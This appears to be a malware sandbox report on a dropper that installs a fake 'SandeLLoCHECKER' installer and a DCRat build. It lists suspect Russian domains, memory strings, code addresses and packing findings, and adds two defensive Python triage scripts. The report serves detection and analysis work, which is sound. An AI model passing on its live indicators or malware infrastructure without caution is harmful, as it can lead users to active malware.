                                    Source: SandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2898761896.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/contact
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/contact(
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/contact(5h
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707913300.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.msi.3.drString found in binary or memory: https://semkrill.ru/contactWindowsTypeNT40DisplayWindows
                                    Source: SandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/support
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707913300.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.msi.3.drString found in binary or memory: https://semkrill.ru/supportAI_SHORTCUTTABLE_FLAGSCOLUMNAQAAAA8AAABTAGEAbgBkAGUATABMAG8AQwBIAEUAQwBLA
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/supportEY
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/supporth1h
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/supporthPh
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                    Source: unknownHTTPS traffic detected: 172.67.184.109:443 -> 192.168.2.4:49730 version: TLS 1.2
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWindow created: window name: CLIPBRDWNDCLASS
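Most of the "String found in binary or memory" rows above are not indicators: font-foundry URLs come from fonts embedded in the .NET payload, ocsp.digicert.com and the authrootstl.cab URL are Authenticode and trusted-root CTL plumbing, the ecosia/yahoo/duckduckgo/google templates are search-provider defaults carried by a Chromium-derived component, and schemas.xmlsoap.org is a .NET claims namespace. What remains is the semkrill.ru and sandello.ru set embedded in SandeLLoCHECKER_Installer.exe and the parent sample, and that has to be read with a caveat: it ships inside the lure installer, and this section does not state which hostname the single observed TLS 1.2 connection to 172.67.184.109:443 served, so the hostname must come from the DNS or TLS SNI records elsewhere in the report before any of these domains is treated as C2. The script below is an added example, not Joe Sandbox code: it takes the raw strings as they appear in the dump rows (trailing overrun bytes such as "0A", "=", "4p", "(5h" included), strips the noise hosts against an assumed allowlist, and groups the rest by host so an analyst sees only what needs a decision.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "String found in binary or memory" rows in this
# section. Trailing bytes such as "0A", "=", "4p", "(5h" are memory-dump overrun, not URL.
SAMPLE_STRINGS = [
    "http://ocsp.digicert.com0A",
    "http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
    "http://www.fontbureau.com/designers/cabarga.htmlN",
    "http://www.carterandcone.coml",
    "http://www.urwpp.deDPlease",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=",
    "https://duckduckgo.com/ac/?q=",
    "https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7z4p",
    "https://discord.semkrill.ru/=",
    "https://semkrill.ru/contact(5h",
    "https://semkrill.ru/support",
    "https://sandello.ru",
]

# Assumed allowlist: hosts that show up in almost any signed Windows binary, .NET assembly,
# embedded font or Chromium-derived component. They carry no attribution value on their own.
NOISE_DOMAINS = (
    "digicert.com", "windowsupdate.com", "schemas.xmlsoap.org", "apache.org",
    "fontbureau.com", "fonts.com", "founder.com.cn", "galapagosdesign.com",
    "goodfont.co.kr", "jiyu-kobo.co.jp", "sajatypeworks.com", "sakkal.com",
    "sandoll.co.kr", "tiro.com", "typography.net", "urwpp.de", "zhongyicts.com.cn",
    "carterandcone.com", "ecosia.org", "yahoo.com", "duckduckgo.com", "google.com",
)

# Hosts in a dump are lower-case while overrun bytes are often upper-case, so a
# case-sensitive host regex already cuts junk like "...netD". Adjacent C strings can be
# glued into one row (favicon.icohttps://...), hence findall rather than match.
HOST_RE = re.compile(r"https?://([a-z0-9.\-]+)")


def is_noise(host: str) -> bool:
    """True if host is, or is a subdomain of, an allow-listed domain.

    The right-hand lookahead tolerates trailing junk letters ("carterandcone.coml") but
    rejects a further label ("digicert.com.evil.example"), so a lookalike is not
    silently allow-listed.
    """
    for dom in NOISE_DOMAINS:
        if re.search(r"(^|\.)" + re.escape(dom) + r"(?![a-z0-9\-]*\.[a-z])", host):
            return True
    return False


def triage(strings):
    """Split raw URL strings into (noise_count, {suspect_host: [raw strings]})."""
    noise = 0
    suspects = defaultdict(list)
    for s in strings:
        for host in HOST_RE.findall(s):
            if is_noise(host):
                noise += 1
            else:
                suspects[host].append(s)
    return noise, dict(suspects)


if __name__ == "__main__":
    n, hits = triage(SAMPLE_STRINGS)
    print(f"{n} noise hosts ignored; {len(hits)} suspect hosts:")
    for host, raws in sorted(hits.items()):
        print(f"  {host}")
        for raw in raws:
            print(f"      {raw}")
```

The allowlist check is deliberately host-level: the path and query in a dump row are unreliable because the string frequently runs into whatever lived next in memory, so the host is the only part worth matching automatically, and the raw rows are kept alongside it for manual cleanup.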

System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009A69A0 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0091D900 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_008583D0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00856460 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_008766A0 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00858AF0 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00868BB0 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_008590B0 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_008B5450 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_008635D0 KillTimer,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_008556E0 GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0085F6E0 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0085F850 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00855E00 SysFreeString,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,NtdllDefWindowProc_W,SysFreeString
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00901F80 NtdllDefWindowProc_W
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_00496FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_0049848E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004940FE
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004A4088
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004A00B7
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004A7153
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004B51C9
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004A62CA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004932F7
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004A43BF
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004BD440
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_0049F461
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_0049C426
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004A77EF
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_0049286B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004BD8EE
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004C19F4
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_0049E9B7
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004A6CDC
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004A3E0B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_0049EFE2
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004B4F9A
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009866E0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0097A850
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009689C0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009B30F0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0099F2B0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A0C1E0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A00110
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0087C210
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00870340
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A2E34A
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009444C0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0086C5A1
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00988600
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00966840
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_008B89F0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A1E95C
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0086EB80
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00972BE0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A32DC9
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A30EA1
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00842EA0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00878E00
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0086CF43
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A391B4
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00845352
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00865470
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0093F7C0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_008474C0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00869760
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00861A20
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_0085FC90
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00877D64
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00A25FA0
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00869F90
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Code function: 11_2_00007FFD9B020DB4
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Code function: 11_2_00007FFD9B1D03F2
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Code function: 11_2_00007FFD9B1E3BF4
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Code function: 11_2_00007FFD9B1D0440
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Code function: 11_2_00007FFD9B1D0438
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Code function: 11_2_00007FFD9B1D0D0D
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Code function: 11_2_00007FFD9B1E3CE8
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 35_2_00007FFD9B02BA8D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 35_2_00007FFD9B02CFC4
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 35_2_00007FFD9B01D873
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 35_2_00007FFD9B027C15
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 35_2_00007FFD9B027C33
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 35_2_00007FFD9B05A18C
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 35_2_00007FFD9B06A4C8
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 35_2_00007FFD9B010DB4
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B000DB4
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B1C4BE0
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B1C3BF3
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B1B03F2
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B1B0438
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B1C52E7
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B1C4FF3
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B1C585A
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B1C4DF2
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B1B0D0D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B8F7276
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B8FB954
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B9010AD
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 36_2_00007FFD9B8FBAB8
Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe | Code function: 37_2_00007FFD9B030DB4
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dll 42E4BA85C71A2C275D4682E3D137CEB5B1B9993541191176E71B2C9E98AE496D
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: String function: 0084A720 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: String function: 00849660 appears 224 times
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: String function: 008481D0 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: String function: 0084A190 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: String function: 004AEC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: String function: 004AF5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: String function: 004AEB78 appears 39 times
Source: gorkmTnChA.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: gorkmTnChA.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: gorkmTnChA.exe, 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs gorkmTnChA.exe
Source: gorkmTnChA.exe, 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameSandeLLoCHECKER_Installer.exeB vs gorkmTnChA.exe
Source: gorkmTnChA.exe, 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNDP48-Web.exeZ vs gorkmTnChA.exe
Source: gorkmTnChA.exe, 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBoxStub.exeT vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000003.1654559691.0000000002BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000003.1661883105.0000000003F8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSandeLLoCHECKER_Installer.exeB vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000003.1661883105.0000000003F8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNDP48-Web.exeZ vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exe, 00000000.00000003.1661883105.0000000003F8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBoxStub.exeT vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exeBinary or memory string: OriginalFileNameSandeLLoCHECKER_Installer.exeB vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exeBinary or memory string: OriginalFilenameNDP48-Web.exeZ vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exeBinary or memory string: OriginalFilenameBoxStub.exeT vs gorkmTnChA.exe
                                    Source: gorkmTnChA.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.csCryptographic APIs: 'CreateDecryptor'
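The static findings above fit together: gorkmTnChA.exe carries two PE32 GUI executables as RT_RCDATA resources, and a single image exposes four unrelated OriginalFilename values (VisualStudio.Shell.Framework.dll, SandeLLoCHECKER_Installer.exe, NDP48-Web.exe, BoxStub.exe), which is what you see when a stub wraps other signed-looking binaries that each bring their own version resource. The behaviour lines confirm the two payloads it writes out (DCRatBuild.exe and SandeLLoCHECKER_Installer.exe). The following Python is an added example, not Joe Sandbox code: it carves every MZ/PE header chain out of a blob offline and reads the UTF-16 OriginalFilename that follows each header, so an analyst can enumerate wrapped payloads without running the dropper. The sample dropper is constructed in code from minimal fake PE headers; the names attached to them are taken from the report, the layout is invented.

```python
"""Carve embedded PE images out of a dropper and read each one's OriginalFilename.

Added example (not Joe Sandbox output). SAMPLE_DROPPER below is a constructed
blob built from minimal, non-runnable PE headers; only the names are from the
report above.
"""
import struct

MACHINES = {0x14C: "i386", 0x8664: "x86-64"}
SUBSYSTEMS = {2: "GUI", 3: "console"}


def build_min_pe(machine=0x14C, subsystem=2, original_name=None):
    """Constructed test input: DOS header -> PE signature -> COFF -> PE32 optional header."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<H", opt, 68, subsystem)                     # Subsystem field
    blob = dos + b"PE\0\0" + coff + bytes(opt)
    if original_name:                                              # fake VS_VERSIONINFO string
        blob += ("OriginalFilename".encode("utf-16-le") + b"\0\0\0\0"
                 + original_name.encode("utf-16-le") + b"\0\0")
    return blob


def original_filename(blob, start, end):
    """Return the UTF-16LE OriginalFilename value inside blob[start:end], or None."""
    key = "OriginalFilename".encode("utf-16-le")
    i = blob.find(key, start, end)
    if i == -1:
        return None
    i += len(key)
    while blob[i:i + 2] == b"\0\0":            # key terminator plus DWORD alignment padding
        i += 2
    j = blob.find(b"\0\0", i)
    while j != -1 and (j - i) % 2:             # terminator must sit on a code-unit boundary
        j = blob.find(b"\0\0", j + 1)
    return blob[i:j].decode("utf-16-le", "replace") if j != -1 else None


def carve_pe(blob):
    """One record per PE header reachable by MZ -> e_lfanew -> 'PE\\0\\0' chaining."""
    found = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            nt = pos + struct.unpack_from("<I", blob, pos + 0x3C)[0]
            if nt - pos >= 0x40 and nt + 94 <= len(blob) and blob[nt:nt + 4] == b"PE\0\0":
                machine = struct.unpack_from("<H", blob, nt + 4)[0]
                magic = struct.unpack_from("<H", blob, nt + 24)[0]
                subsystem = struct.unpack_from("<H", blob, nt + 24 + 68)[0]
                if magic in (0x10B, 0x20B) and machine in MACHINES:
                    found.append({"offset": pos, "machine": MACHINES[machine],
                                  "format": "PE32" if magic == 0x10B else "PE32+",
                                  "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem))})
        pos = blob.find(b"MZ", pos + 1)
    # The version resource of each image lies between its header and the next one.
    for k, rec in enumerate(found):
        end = found[k + 1]["offset"] if k + 1 < len(found) else len(blob)
        rec["original_filename"] = original_filename(blob, rec["offset"], end)
    return found


SAMPLE_DROPPER = (
    build_min_pe(original_name="SandeLLoCHECKER_Installer.exe")   # outer stub
    + b"\0" * 32 + b"RT_RCDATA"                                    # resource-directory filler
    + build_min_pe(original_name="DCRatBuild.exe")                 # first embedded payload
    + b"\xff" * 16
    + build_min_pe(subsystem=3, original_name="NDP48-Web.exe")     # second embedded payload
)

if __name__ == "__main__":
    for rec in carve_pe(SAMPLE_DROPPER):
        print(f"{rec['offset']:#08x} {rec['format']} {rec['machine']} {rec['subsystem']} "
              f"OriginalFilename={rec['original_filename']}")
```

On a real dropper, run carve_pe over the whole file and compare the OriginalFilename of each carved image with the names the report lists; a PE whose version name matches none of its neighbours is the one worth unpacking first.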
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@46/102@1/2
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_00496C74 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_00992D90 GetDiskFreeSpaceExW
